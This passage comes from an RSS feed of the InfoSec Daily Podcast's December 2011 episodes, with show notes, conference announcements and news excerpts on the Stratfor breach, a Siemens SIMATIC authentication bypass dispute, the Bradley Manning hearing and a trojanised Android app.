	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Actually, aside from the CDSN hack, none of the other hacks have been officially confirmed yet; however, much of the stolen account information has been published online (see, for example, the image of Duowan usernames and passwords above), so the reports appear to be fairly accurate. This certainly appears to be very bad news for Chinese net users &mdash; and gamers in particular &mdash; but we&rsquo;ll keep an eye on this and update once more has come to light.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick&rsquo;s Top 5 Moments of 2011:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Top &ldquo;anything&rdquo; lists are notoriously hard to make, especially when you&rsquo;re trying to sort through a year&#39;s worth of memories and can barely remember last week. &nbsp;So without further ado, here is my best of 2011 &#8211; my top five personal moments of the year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">5) BackTrack 5 Released-</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Long awaited, the release of BT5 was something that most people looked forward to. &nbsp;It took the repos no longer being available to cause me to make the transition. &nbsp;Since then it&rsquo;s grown on me and has certainly made my life easier. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">4) Hackitivism</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Without identifying &nbsp;a single group I would have to say that the various hackitist activities have had a lasting impact on the industry and the general populous. &nbsp;Okay maybe not the general public, but certainly on most Governments across the globe.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">3) OS X Lion</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; The long awaited arrival of OS X Lion was met with disdain and disgust over having programs that functioned well with Leopard and Snow Leopard suddenly stop working. &nbsp;Lesson here is that sometimes it pays to wait on upgrades. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">2) DerbyCon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Finally a security conference that the average InfoSec practitioner can actually get tickets for. &nbsp;But more than that, it&rsquo;s a conference that allows us to see &ldquo;rockstars&rdquo; in a really intimate setting. &nbsp;If I attend only one conference next year, it WILL be DerbyCon.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">1) Our Crew</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; The addition of Boris, Dave, Beau and Them to our show as co-hosts. &nbsp;So maybe this is not a security moment, but it certainly had an great impact on me. &nbsp;Putting on a daily show is very taxing on us personally and they have certainly added some great insight, content and assistance in keeping this show going. &nbsp;I want to personally thank Karthik, Geordy, Adrian, Boris, Dave, Beau and Them. &nbsp;Without these great guys this show wouldn&rsquo;t have lasted this long.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-553-stratfor-miamipdgodaddy-siemens-cdsn-ricks-top-5/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3304/0/infosec-daily-podcast-episode-553.mp3" length="18200177" type="audio/mpeg" />
		<itunes:duration>0:37:52</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 553 for December 27, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all k[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 553 for December 27, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.computerworld.com/s/article/9223025/Confidential_client_list_safe_from_Anonymous_Stratfor_says
	Activist hacker group Anonymous has claimed to have stolen thousands of emails, passwords and sensitive credit card details from a US-based security think-tank, forcing it to suspend operations. &#160;Promising it was just the start of a week-long Christmas inspired assault on a long list of targets.
	The Hackers Group said they were obtain the information because the stratfor did not encrypt it. The Austin-based company which provides international affairs and security threats, says the operation has been suspended on its server and email. Stratfor website was not working on Monday .
	The breach doesn&#39;t necessarily pose a risk to owners of the credit cards. A card user who suspects fraudulent activity on his or her card can contact the credit card company to dispute the charge.
	Stratfor said in an email to members that it had suspended its servers and email after learning that its website had been hacked. Stratfor&#39;s sent an e-mail to subscribers yesterday, confirming the cyberattack .
	&#34;We have reason to believe that the names of our corporate subscribers have been posted on other web sites,&#34; said the email, signed by Stratfor Chief Executive George Friedman and passed on to AP by subscribers. &#34;We are diligently investigating the extent to which subscriber information may have been obtained.&#34;
	&#34;Stratfor&#39;s relationship with its members and, in particular, the confidentiality of their subscriber information, are very important to Stratfor and me,&#34; Friedman wrote.
	One member of the hacking group, who uses the handle AnonymousAbu on Twitter, claimed that more than 90,000 credit cards from law enforcement, the intelligence community and journalists &#8211; &#34;corporate/exec accounts of people l[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 552 &#8211; EL/PDC/ISD Christmas Caroling, Siemens, Manning, LogMeIn Free, Islamic Compass, Web Rule Rewrite &amp; Op Elveden</title>
		<link>http://www.isdpodcast.com/episode-552-elpdcisd-christmas-caroling-siemens-manning-logmein-free-islamic-compass-web-rule-rewrite-op-elveden</link>
		<comments>http://www.isdpodcast.com/episode-552-elpdcisd-christmas-caroling-siemens-manning-logmein-free-islamic-compass-web-rule-rewrite-op-elveden#comments</comments>
		<pubDate>Fri, 23 Dec 2011 01:50:58 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3299</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 552 for December 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma. &#160; Announcements: No Show Tomorrow Night! &#160;Next show will on December 27th. Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 552 for December 22, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No Show Tomorrow Night! &nbsp;Next show will on December 27th.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span><br />
	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://uk.ibtimes.com/articles/270736/20111221/siemens-lied-major-bugs-security-expert.htm"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://uk.ibtimes.com/articles/270736/20111221/siemens-lied-major-bugs-security-expert.htm</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Siemens has lied to the press about security bugs that could affect critical infrastructure, according to a security expert who has made public the password for Siemens&#39; machinery.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Billy Rios is a security engineer for a software company and has written on his personal blog that Siemens&#39; SIMATIC systems can be easily hacked into and controlled remotely by anyone with an internet connection.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rios claims that Siemens PR told a Reuters reporter that &quot;there are no open issues regarding authentication bypass bugs at Siemens,&quot; contrary to what Rios believes. &quot;In May of this year,&quot; he writes, &quot;I reported an authentication bypass for Siemens SIMATIC systems. These systems are used to manage Industrial Control Systems and Critical Infrastructure. I&#39;ve been patiently waiting for a fix for the issue which affects pretty much every Siemens SIMATIC customer.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://itunes.apple.com/us/app/logmein/id479229407?ls=1&amp;mt=8"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://itunes.apple.com/us/app/logmein/id479229407?ls=1&amp;mt=8</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you need remote access to your desktop from your iOS phone or tablet, now you can get there for free. Starting today, LogMeIn has a new app in the Apple App Store and it is free. </span><img height="469px;" src="https://lh3.googleusercontent.com/EiGNKKmRUtwoBoUg6suJH9gQ-phW6XBPI9aBqgbzKCDAno0gai69CIR4UIGhAldMM0PQfsp4hHNDVOze3r6KjTAiOtcl0uGqIduyZasOzM0v2lES78o" width="476px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This replaces their low-end Ignition app that they previously charged $30 for. It doesn&#39;t give you everything that the current paid app provides, such as file management and cloud storage and HD video/audio streaming. But if you just need remote access, then the free app will do quite nicely. You of course need to run the free version (or the paid version) of LogMeIn on your Windows or Mac desktop, and set up an account online with them to complete the connection. What I like about LogMeIn is how they are upstanding guys. If you put down your money in the past for Ignition, you will be grandfathered in and have the premium features forever. They are planning on an Android app next year, naturally. The Pro version is $40 a year. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.ajc.com/news/nation-world/defense-says-manning-victim-1268168.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ajc.com/news/nation-world/defense-says-manning-victim-1268168.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A seven-day hearing into the biggest national security leak in U.S. history ended Thursday with defense lawyers insisting that the accused soldier was a victim of overreaching by a military that didn&#39;t even follow its own rules for safeguarding sensitive information.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning is escorted out of a courthouse in Fort Meade, Md., Wednesday, Dec. 21, 2011, after a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case went on recess for the day. (AP Photo/Patrick Semansky)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning, center, is escorted out of a courthouse in Fort Meade, Md., Wednesday, Dec. 21, 2011, after a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case went on recess for the day. (AP Photo/Patrick Semansky)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning, left, steps out of a security vehicle outside of a courthouse in Fort Meade, Md., Wednesday, Dec. 21, 2011, for a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case. (AP Photo/Patrick Semansky)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Pfc. Bradley Manning, left, is escorted from a courthouse in Fort Meade, Md., Thursday, Dec. 22, 2011, after closing arguments concluded in a military hearing that will determine if he should face court-martial for his alleged role in the WikiLeaks classified leaks case. (AP Photo/Patrick Semansky)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The government argued that it had made its case for a court-martial of Pfc. Bradley Manning, a troubled young intelligence analyst who prosecutors said aided the enemy by leaking troves of documents.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lawyers for the prosecution and defense gave closing arguments in the preliminary hearing at a military base outside Washington to determine whether Manning should be tried for allegedly sending hundreds of thousands of diplomatic documents and Iraq and Afghanistan war zone field reports to the anti-secrecy website WikiLeaks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; The presiding officer, Lt. Col. Paul Almanza, has until Jan. 16 to recommend whether the 24-year-old Crescent, Okla., native should be court-martialed.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; Speaking for more than an hour, the chief prosecutor, Capt. Ashden Fein, methodically recounted evidence supporting each of the 22 charges, illustrating his arguments with several dozen slides projected on courtroom screens.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &quot;He did this during a time of war,&quot; Fein said. Laid bare on the Internet last year were military procedures for providing air support for ground troops and procedures used to fly the injured out for medical treatment, he said. Leaked documents also included names of units, intelligence sources and methods, as well as tactics used by troops in general, including secretive special operations commando forces, he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &quot;He wrongfully and wantonly caused the information to be published on the Internet&quot; knowing that &quot;enemies of the United States use the Internet,&quot; Fein said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; Manning was trained and trusted to provide intelligence that battlefield commanders needed, and he abused that trust while serving in Iraq from late 2009 to mid-2010, the prosecutor said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; Defense attorney David Coombs spoke for about 20 minutes and never denied his client had leaked the documents.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Malicious-Android-App-Spreads-Revolution-Messages-242464.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Malicious-Android-App-Spreads-Revolution-Messages-242464.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A legitimate Islamic compass Android application was discovered by Symantec researchers to hide a mobile Trojan designed to promote revolutionary topics in the Middle East.</span></p>
